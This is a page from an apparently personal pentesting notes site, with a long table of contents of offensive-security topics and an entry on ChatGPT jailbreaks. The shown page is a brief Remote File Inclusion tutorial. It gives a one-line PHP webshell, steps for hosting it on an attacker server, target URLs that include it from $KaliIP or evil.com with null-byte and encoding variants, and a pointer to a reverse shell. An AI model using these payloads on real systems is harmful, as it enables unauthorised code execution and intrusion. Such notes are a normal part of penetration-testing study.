🩸
Pentesting Notes
  • ㊙️r3dcl1ff
    • 🔬Enumeration
      • FTP 21
      • SSH 22
      • Telnet 23 - 2323
      • SMTP 25
      • DNS 53
      • 80 http
        • /phpbash.php
        • inspecting source | Devtools
        • toolbar that allows to run commands on target
        • Wordpress Enumeration
          • Extra commands
          • WPScan one-liners
          • Plugins & Themes exploitation
            • AdRotate
            • Tsumugi 404.php
            • Twentytwenty (Theme)
            • Woody AD Snippets
            • Activity monitor 2
            • wp.spritz
            • Social Warfare
            • Mail Masta 1.0
            • Twentyfourteen
          • CVE-2020-35489 Contact Form 7
          • one-liners
          • CVE-2023-23488
          • nmap
          • Common directories
          • MoveStore API Auth bypass
        • Drupal
        • Koken CMS
        • Codiad
        • /.git
        • Subrion CMS 4.2.1
        • Fuel CMS
        • phpmyadmin
        • /cgi-bin Shellshock
        • Sar2HTML
        • Cute News
        • Nagios
        • Joomla
        • advanced_component_system
        • webdav
        • OTRS 5.0
        • Apache James
        • Ovidentia
        • Cuppa CMS
        • Phreebooks
        • Elastix 2.2.0
        • ApPHP MicroBlog
        • MongoDB 2.2.3
        • CMS Made Simple 2.2.13
        • Jinja2
        • Webmin
        • robots.txt
        • BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
        • Squid proxy
        • simfony CMS
        • C-Panel Reflected XSS - CVE-2023-294
        • vBulletin <= 5.6.9: Pre-authentication Remote Code Execution
      • 88 Kerberos
      • Pop 110-995
      • RPC 111
      • Ident 113
      • NNTP 119
      • NETBios 137-138
      • SMB-Samba 135-139 445
      • MSRPC 135
      • SNMP 161
      • LDAP - 389,636
      • Modbus 502
      • OpenSSL 1337
      • Ms-SQL 1433
      • Oracle Listener 1521 1522 1529
      • NFS 2049
      • MySql 3306
      • RDP 3389
      • ADB Android Debug Bridge 5555
      • WinRM 5985 5986
      • VNC 5800 5900
      • Redis 6379
      • Unreal IRC 6667
      • Tomcat 8080
      • MongoDB 27017
      • Webapp Enum Methodology
      • IIS
    • 🧨Exploitation (deprecated node)
      • Password cracking
        • common passwords
        • online resources
        • hashID
        • john
        • Hashcat
        • Cewl
        • Cupp
        • Hydra
        • fcrackzip
        • Medusa
        • Bash for password creation | cracking
        • Cracking netcat connection
        • Crunch
        • haklistgen
      • Data wrappers
      • Reverse shells
      • Client side attacks
        • msfvenom hta attack
        • MSOffice macro attack
          • Metasploit Office Macro
        • HTML application attack
      • Log poisoning
      • 📡Wireless attacks
      • DoS Denial of Service
      • Microsoft Exchange Pentesting
    • 🈲Privesc
      • sudo + GTFObins
        • sudo /bin/bash
        • /bin/rpm
        • /usr/bin/gdb
        • /usr/bin/php7.2
        • sudo -u#-1 /bin/bash
        • jjs
        • /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java
        • /usr/bin/vim
        • /usr/bin/tee
        • /usr/bin/nice
        • /usr/bin/dd
        • nmap
        • /usr/bin/zip
        • /usr/bin/date
        • /usr/bin/base32
        • /usr/sbin/hping3
        • /usr/bin/cpulimit
        • /usr/bin/python
        • /etc/passwd
        • echo /bin/bash to executable file
        • /usr/bin/find
        • sudo_inject
        • /bin/systemctl
        • less
        • /bin/ash
        • awk
        • scp
        • man
        • ftp
        • knife
        • /usr/sbin/iftop
        • /usr/bin/nano
        • ed
        • openssl (read file)
        • tar
        • flock
        • expect
        • socat
        • Perl
        • /usr/bin/env
        • strace
      • Docker privilege escalation
      • Kernel Exploits
        • Compiling - General guidelines
        • Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)
        • LXD - Alpine
        • Serv-U FTP Server < 15.1.7
        • [CVE-2016-5195] dirtycow 2
        • Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5...)
        • Linux Kernel 2.6.39 "Mempodipper"
        • Samba 2.2.x - Remote buffer overflow
        • Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)
        • Full Nelson
        • Exim 4.84-3 - Local Privilege Escalation
        • Clown NewUser|Linux 3.0<3.3.5|
        • fasync_helper|Linux Kernel <2.6.28
        • NFS no_root_squash/no_all_squash
      • 'Nix manual enumeration
      • File transfers
        • Windows file transfers
          • Certutil
          • VBScript
          • Powershell
          • pyftpdlib
          • impacket
          • exe2hex
          • php exfil | Win --> Kali
          • http transfers
        • 'Nix file transfers
      • Windows enumeration
        • Automated scripts
      • Wordpress privesc
      • OpenSSL privesc
      • Privesc scripts | resources
        • Linux Exploit suggester
        • Vulmap
      • vi
    • 🖥️CLI-Fu
      • Moving around
      • mkdir
      • find sort grep uniq awk
      • head tail sed cut
      • tar-zip
      • Fucking Vim
      • 'Nix | Windows CLI comparison
    • 🎯OSINT
      • 📧Email OSINT
        • HaveIbeenPWND
        • TheHarvester
        • O365
        • Suspicious Email analysis
          • Websites
        • H8mail
      • Recon-NG
      • 🥋Shodan
        • Ransomware search
        • Shodan Galore
        • Assorted queries (short)
        • Mindmap
        • ⛓️Compound commands
        • Assorted tricks for BBP
      • 🕸️Spiderfoot
      • Metagoofil
      • Websites
        • Fofa
      • ℹ️Favicon OSINT
      • Username Enum
        • Nexfil
        • Blackbird
        • Sherlock
        • DetectDee
      • Greynoise
      • 🗣️ChatGPT Jailbreaks
      • Postman
        • Postmaniac
        • Porch-Pirate
      • Google dorks
        • Basic Dorks
        • Dorks -Bug bounty edition-
        • Extra dorks
        • Automated tools
          • 🐚Shell script for automated dorking
          • GooFuzz
          • go-dork
      • SOCMINT
        • U-Scrapper
        • Telegram OSINT
        • one-plus OSINT
      • Censys
      • ☎️Phone OSINT
    • 🛠️Tools
      • netcat
      • ncat
      • Socat
      • 💻Assorted scripts
        • Buffer Overflows
          • Windows Bof
        • Mitigation script CVE 2022-41040
      • Bash Voodoo
      • 🦈Wireshark
      • Aircrack-ng
      • TCPDump
      • cloudflare Bypass
      • Shuffledns
    • 🟦Active Directory
      • Enumeration
        • ADRecon.ps1
        • Power View
        • Manual Enum basics
        • 🦮Bloodhound
      • Mimikatz
      • 🐺kerberoasting
      • Pass-the-hash
    • 🪓Sysadmin
      • Pimp my kali
      • Random commands
    • 🗒️Pentesting Checklist(s)
      • 🏢Internal Pentest Checklist
        • Rules of engagement
        • Recon
        • Social Engineering
          • Phishing
            • Evilurl
            • Sendemail
            • urlcrazy
            • Website Cloning
            • Detect Phishing sites in real time
            • Homograph attacks
              • DNSTwist
            • URL Masking
            • Email OSINT
            • Test deliverability before campaign
            • Spoofing with python
            • Deepfake
            • HTML Templates
              • Win10 simple html
    • 🕷️WebApp Pentest
      • Vuln scanners
        • Tenable Nessus
        • Sn1per
        • OpenVAS
        • nuclei
        • 🕷️Black Widow
        • Cariddi
        • 🤖BBOT
      • Attack Surface Recon
        • Subdomain-enum
          • Scilla
          • Amass
          • Sublist3r
          • Assetfinder
          • Subfinder
        • DNS permutations
          • PureDNS
          • TLSx
          • MassDNS
          • AltDNS
          • shuffleDNS
          • DNSValidator
        • Legacy tools
          • Fierce
          • DNS Recon
          • Dig
          • DNSAudit
        • Hakluke
          • Hakrevdns
          • hakip2host
          • Hakoriginfinder
        • ffuf
        • One liners
        • Wordlists and Resolvers
        • IPinfo
        • 🧾Scripts
          • TLD enum Script
          • Bugbounty Subdomain enum script
        • 🇳🇴gungnir
        • NMAP
        • Hednsextractor
        • Caduceus
      • Port scanning
        • NMAP
        • Naabu
        • masscan
        • nmapAutomator
        • smap (shodan Nmap)
      • Subdomain Bruteforcing + crawling
        • Katana
        • LogSensor
        • jsubfinder
      • File inclusion
        • Liffy
        • LFISuite
        • CRLFI
        • LFI - Theory & basic commands
        • RFI - Theory & basic commands
        • one liners
        • HTTPX
        • Dorks
      • ⏪Traversal
        • Path Traversal
          • Windows Directory traversal
          • Linux Directory traversal
        • dotdotPWN
      • Content Discovery
        • gobuster
        • dirb
        • Gospider
        • Hakrawler
        • webpalm
        • OpenDoor
        • Feroxbuster
        • httpx
        • JS File Analysis and Scraping
      • Fuzzing
        • wfuzz
        • ffuf
        • Fuzzing Wordlists
        • Fuzzuli (fuzz backup files)
        • find hidden directories
        • Headers Fuzzing (headerpwn)
      • Parameters
        • Arjun
        • Paramspider
        • X8
      • Open redirect
        • Oralyzer.py
        • Dom-Red
        • OpenRedireX
        • Dorks
      • HTTP Request Smuggling
        • smuggler
        • http-request smuggler
        • h2csmuggler
      • Server Side Request Forgery
        • SSRFMap
        • 🏄‍♂️Surf
        • one-liners
        • Top parameters
        • Dorks
      • 💉SQLi
        • SQLi (Manual testing)
          • Login bypass
          • URL enum
          • Oracle SQLi
          • SQLi to code execution
          • Ghauri
        • SqlMap
        • One-liners
        • CVEs
          • CVE-2023-25157: CVE-2023-25157 - GeoServer SQL Injection
        • Dorks
      • XSS Cross Site Scripting
        • XXS manual testing
        • PWN-XSS
        • 🦊Dalfox
        • PrototypePollution to XSS
        • one-liners
        • Gxss
        • XSStrike
        • Embed XSS payload into image file
        • WAF Bypass 2024
          • Extra payloads
        • Knoxss + knoxsnl
        • Dorks
      • Links
        • GAU Get All URLs
        • Waybackurl
      • Git
        • gitjacker
        • github-subdomains
        • GitGot
        • 🐗Trufflehog
        • Github-Dorks
      • Text manipulation
        • qsreplace (Tomnomnom)
        • anew (Tomnomnom)
        • Jq (JSON parser)
        • Urldedupe
        • Gf
      • CORS
        • Corsy COR misconfigs scanner
        • One-liners
        • CORScanner
      • CSRF Cross Site Request Forgery
        • XSRFProbe
      • Assorted
        • CMSMap
        • Mantra (secrets crawler)
        • CMSeek
        • web-screenshots using nuclei
        • SecretsFinder
      • Screenshots
        • 🌊Aquatone
        • gowitness
      • Command Injection
        • Commix
      • SSTI
        • SSTIMap
      • IDOR
      • Bypass 40X
        • 403Jump
        • nomore403
      • Subdomain Takeover
        • NTHIM Now The Host Is Mine
        • Subzy
      • Headers Security
        • Hauditor
        • Header injection (Headi)
      • 🐝API pentesting
        • Swagger Jacker
        • Google Dorks
      • RCE
    • 🌩️Cloud
      • Enum
        • 👿Tenant Hunter (Azure specific)
        • S3scanner
        • Cloud_enum
        • BucketLoot
    • 🧠Threat Intel
      • 🌑Darknet + Tor resources
        • deepDarkCTI
        • Awesome darknet
        • 👿TheDevilsEye
        • Dark Web OSINT tools
        • DarknetEye - Tor Links
        • Ransomware TTPs
        • APTs resources
      • Interactive maps
        • APT map
        • Shodan ICS attack map
        • Global data on ransomware attacks
      • Malware analysis
        • Cuckoo
      • Phishing URL check
    • 📟IoT / IIoT
      • Github Repos
      • Commercial Frameworks
      • Exploitation frameworks
        • Routersploit
        • Genzai
      • Flipper Zero
        • Repos and resources
      • UEFI Pentesting
        • Qiling
        • Resources adn repos
      • Bluetooth
        • Bluing
    • 🏭ICS/OT - SCADA
      • Active Enumeration
        • Cisco-Torch
        • Nmap
          • HVAC 80
          • Siemens S7 102
          • DICOM 104
          • ATG 443
          • Modbus - Schneider 502
          • MQTT 1883
          • NiagaraFox 1911
          • PCWorx 1962
          • CSPv4 2222
          • IEC 2404
          • Mitsubishi Electric MELSEC PLC 5006
          • Omron 9600
          • DNP3 20000 (TCP-UDP)
          • Knx-gateway 3671
          • ProConOS 20547
          • Rockwell Automation Allen-Bradley 44818
          • Bacnet 47808
        • OSINT
        • Passwords and creds
          • SCADAPASS
        • Metasploit
      • Passive Enumeration
        • Grassmarlin
        • Siemens Simatic PCS 7 Hardening Tool
        • tshark
      • Hardware / Lab setup
        • ClickPLC Plus
      • Github repos and resources
        • online resources
        • Github repos
    • 🩻Private Templates
      • CVE-2024-6387
      • CORS Misconfig
      • CVE-2024-34750
      • CVE-2024-6409 Race Condition in OpenSSH 8.7p1,8.8p1
      • Symfony F#ck U
      • CVE-2024-40725
      • SSRF check
      • Gavazzi Automation UWP 3.0
      • Siemens Simatic PLC
      • CVE-2024-7339
      • Frontpage-exposures
      • in-tank IIoT exposure
      • unauth-VNC
      • Rockwell-Allen-Bradley PLC Detect
      • Hipcam IoT Camera Detect
      • CVE-2024-43044
      • Ivanti-CSA-detect
      • CVE-2024-8190 (Ivanti Command Injection)
      • CVE-2024-38812
      • DB-Dump-Detect
      • Linux Fuzz
      • detect-config.ini
      • Laravel-log
    • 🐞BBP
  • Daily Syncs
    • Design Standups
      • September 2021
        • Week 1 (6 - 10 Sept)
  • Weekly Syncs
    • Company Weeklies
      • 1st September 2021
  • Other Regulars
    • Company Weeklies
      • September 14th 2021
Powered by GitBook
On this page
  1. r3dcl1ff
  2. WebApp Pentest
  3. File inclusion

RFI - Theory & basic commands

#Basics

Remote file inclusion (RFI)
  
1)evil payload hosted on kali + apache server  

2)nc listener to catch revshell  

…..file=http://192.168.177.119:8080/evil.txt

cat evil.txt
<?php system($_GET['cmd']); ?>
 
The ‘cmd’ in the string will allow to execute any code once in place

3)move the evil.txt  to  /var/www/html/evil.txt

then start apache server:
sudo systemctl start apache2
check that is up and running
service apache2 status

once hosted in /var/www/html you can retrieve the evil webshell from the url
  
…file=http://192.168.119.177/evil.txt&cmd=ipconfig

#At this point escalate running a revshell on target

#Assorted tricks

http://target.com/index.php?page=http://$KaliIP/shell.txt   #vanilla
http://target.com/index.php?page=http://$KaliIP/shell.txt%00 #end with nullbyte
http://target.com/index.php?page=http:%252f%252fevil.com%252fshell.txt #encode the request

#Extra server options 

Python : python –m SimpleHTTPServer 8080
         python3 –m http.server 8080

PHP : php –S 0.0.0.0:8080

Ruby: ruby –run –e httpd . –p 8000 

Busybox :  busybox httpd –f –p 10000

PreviousLFI - Theory & basic commandsNextone liners

Last updated 1 year ago

㊙️
🕷️